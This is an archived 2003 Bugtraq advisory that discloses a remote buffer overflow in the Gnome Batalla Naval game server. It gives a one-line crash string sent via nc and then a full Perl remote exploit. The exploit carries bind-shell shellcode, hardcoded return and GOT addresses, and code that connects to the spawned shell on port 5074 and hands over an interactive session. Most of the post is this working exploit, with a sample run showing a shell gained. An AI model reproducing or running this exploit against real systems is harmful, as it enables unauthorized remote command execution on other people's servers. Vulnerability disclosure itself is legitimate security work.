[Priv8security Advisory] Batalla Naval remote overflow

From: wsxz (wsxz_at_terra.com.br)
Date: 05/26/03

  • Next message: flur: "PalmVNC 1.40 Insecure Records" 
    Date: Mon, 26 May 2003 19:41:09 +0000
To: "bugtraq" <bugtraq@securityfocus.com>

    Priv8security advisory: 1 ----------------------------------------------------------------------- Product: Gnome Batalla Naval Version: 1.0.4 (and probably earlier versions) Vendor: http://batnav.sourceforge.net/ Problem: Remote Buffer overflow Author: Wsxz (wsxz@priv8security.com) ----------------------------------------------------------------------- I - About: ---------- From vendor site: Batalla Naval is a networked, multiplayer battleship game. It has robots, and support for GGZ Gaming Zone and for IPv6. II - Problem: ------------- When a user starts gbnserver, remote players can crash the server by sending a long string. (perl -e 'print "A" x 500 . "\xdc\xf8\x04\x08" . "\x0f\xff\xff\xbf" x 20 . "\r\n"';cat) | nc localhost 1995 gdb output. 0x405584f7 in poll () from /lib/i686/libc.so.6 (gdb) c Continuing. Program received signal SIGSEGV, Segmentation fault. 0xbfffff7a in ?? () This string will cause gbnserver to crash and making it possible to users execute commands under uid of user that started the server. III - Fix: --------- No fix at the moment. IV - Credit: ----------- Bug found by wsxz, any questions mail me at wsxz@priv8security.com Visit http://www.priv8security.com Sorry, for my poor english. V - Exploit (Proof of Concept): ------------------------------- Exploit url http://releases.priv8security.org/priv8gbn.pl ---cut here---- #!/usr/bin/perl # Priv8security.com remote exploit for Gnome Batalla Naval Server v1.0.4 # # Game url http://batnav.sourceforge.net/ # Tested against Mandrake 9.0 # # [wsxz@localhost buffer]$ perl priv8gbn.pl 127.0.0.1 # Connected! # [+] Using ret address: 0xbffff3a2 # [+] Using got address: 0x804f8dc # [+] Sending stuff... # [+] Done ;pPPp # [?] Now lets see if we got a shell... # [+] Enjoy your stay on this server =) # Linux wsxz.box 2.4.21-0.13mdk #1 Fri Mar 14 15:08:06 EST 2003 i686 unknown unknown GNU/Linux # uid=503(wsxz) gid=503(wsxz) groups=503(wsxz) # use IO::Socket; if (@ARGV < 1 || @ARGV > 3) { print "-= Priv8security.com remote gbatnav-1.0.4 server on linux =-\n"; print "Usage: perl $0 <host> <port=1995> <offset=100>\n"; exit; } if (@ARGV >= 2) { $port = $ARGV[1]; $offset = $ARGV[2]; } else { $port = 1995; $offset = 0; } $shellcode = #bind shellcode port 5074 by s0t4ipv6@shellcode.com.ar "\x31\xc0\x50\x40\x89\xc3\x50\x40\x50\x89\xe1\xb0\x66". "\xcd\x80\x31\xd2\x52\x66\x68\x13\xd2\x43\x66\x53\x89\xe1". "\x6a\x10\x51\x50\x89\xe1\xb0\x66\xcd\x80\x40\x89\x44\x24\x04". "\x43\x43\xb0\x66\xcd\x80\x83\xc4\x0c\x52\x52\x43\xb0\x66". "\xcd\x80\x93\x89\xd1\xb0\x3f\xcd\x80\x41\x80\xf9\x03\x75\xf6". "\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53". "\x89\xe1\xb0\x0b\xcd\x80"; $ret = 0xbffff3a2; # ret mdk 9.0 $gotaddr = 0x0804f8dc; #objdump -R ./gbnserver | grep strcpy $new_ret = pack('l', ($ret + $offset)); $new_got = pack('l', ($gotaddr)); $buffer .= "\x90" x (500 - length($shellcode)); $buffer .= $shellcode; $buffer .= $new_got; $buffer .= $new_ret x 20; $f = IO::Socket::INET->new(Proto=>"tcp", PeerHost=>$ARGV[0],PeerPort=>$port) or die "Cant connect to server or port...\n"; print "Connected!\n"; print "[+] Using ret address: 0x", sprintf('%lx',($ret)), "\n"; print "[+] Using got address: 0x", sprintf('%lx',($gotaddr)), "\n"; print "[+] Sending stuff...\n"; print $f "$buffer\r\n\r\n"; print "[+] Done ;pPPp\n"; print "[?] Now lets see if we got a shell...\n"; close($f); $handle = IO::Socket::INET->new(Proto=>"tcp", PeerHost=>$ARGV[0],PeerPort=>5074,Type=>SOCK_STREAM,Reuse=>1) or die "[-] No luck, try next time ok ...\n"; print "[+] Enjoy your stay on this server =)\n"; $handle->autoflush(1); print $handle "uname -a;id\n"; # split the program into two processes, identical twins die "cant fork: $!" unless defined($kidpid = fork()); # the if{} block runs only in the parent process if ($kidpid) { # copy the socket to standard output while (defined ($line = <$handle>)) { print STDOUT $line; } kill("TERM", $kidpid); # send SIGTERM to child } # the else{} block runs only in the child process else { # copy standard input to the socket while (defined ($line = <STDIN>)) { print $handle $line; } } ---cut here-----

  • Next message: flur: "PalmVNC 1.40 Insecure Records"

    Relevant Pages

    • SecurityFocus Microsoft Newsletter #152
      ... MICROSOFT VULNERABILITY SUMMARY ... Real Networks Helix Universal Server Remote Buffer Overflow ... ... NEW PRODUCTS FOR MICROSOFT PLATFORMS ...
      (Focus-Microsoft)
    • SecurityFocus Microsoft Newsletter #140
      ... Cafelog b2 Remote File Include Vulnerability ... Webfroot Shoutbox Remote Command Execution Vulnerability ... Pablo Software Solutions Baby POP3 Server Multiple Connection... ... Microsoft Windows XP Nested Directory Denial of Service... ...
      (Focus-Microsoft)
    • RE: SBS 2003 sudden services problem over router based vpn
      ... I understand that your remote cannot receive POP3 emails through VPN ... SBS Server through routers. ...
      (microsoft.public.windows.server.sbs)
    • RE: Download connection Manager through RWW
      ... the issue may occur due to the Remote VD is ... Then please rerun the CEICW wizard and Configure Remote access wizard ... Start Internet Explorer. ... Since the Symantec anti-virus application installed on the server, ...
      (microsoft.public.windows.server.sbs)
    • Re: Connecting a remote workstation to a domain
      ... Terminal Server to go with the SBS server. ... I can remotely join XP Pro computers at the remote ... either way it loads her cached roaming profile ... I need the local printers at the remote office to be set up ...
      (microsoft.public.windows.server.sbs)